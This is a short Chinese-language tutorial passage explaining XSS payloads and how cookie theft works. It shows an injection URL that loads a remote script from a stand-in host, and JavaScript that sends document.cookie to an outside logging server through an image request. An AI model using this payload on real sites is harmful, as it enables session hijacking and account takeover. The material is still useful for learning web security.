多应用+插件架构,代码干净,二开方便,首家独创一键云编译技术,文档视频完善,免费商用码云13.8K 广告
完成具体功能的恶意脚本(javaScript、Flash 等)称为 XSS Payload。黑客会通过这些脚本,来控制用户的浏览器。劫持 Cookie 就是一种 XSS Payload。 Cookie 中,一般加密存放着当前用户的登陆凭证。如果 Cookie 被劫持,那么黑客就可以不使用密码,直接登陆到用户的账号中 ### 窃取 Cookie 首先先在存在 XSS 漏洞的网站,加载一段远程脚本,形如: ~~~ http://www.xxx.com/xxx.html?param="><script src=http://www.malice.com/malice.js></script> ~~~ XSS Payload 写在 malice.js 中,这样就可以避免直接在 URL 参数中写入大量的脚本代码。 malice.js 内容: ~~~ var img = document.createElement("img"); img.src = "http://xxx.com/log?" + escape(document.cookie); document.body.appendChild(img); ~~~ escape() 函数可对字符串进行编码,这样就可以在所有的计算机上读取该字符串。在此,我们动态创建了一个图片标签,并把 cookie 参数作为对象,发送给后端服务器 ![](https://img.kancloud.cn/99/91/9991375d0850be88c6b367022afdce14_314x107.png) 这样就完成了窃取 Cookie 的整个过程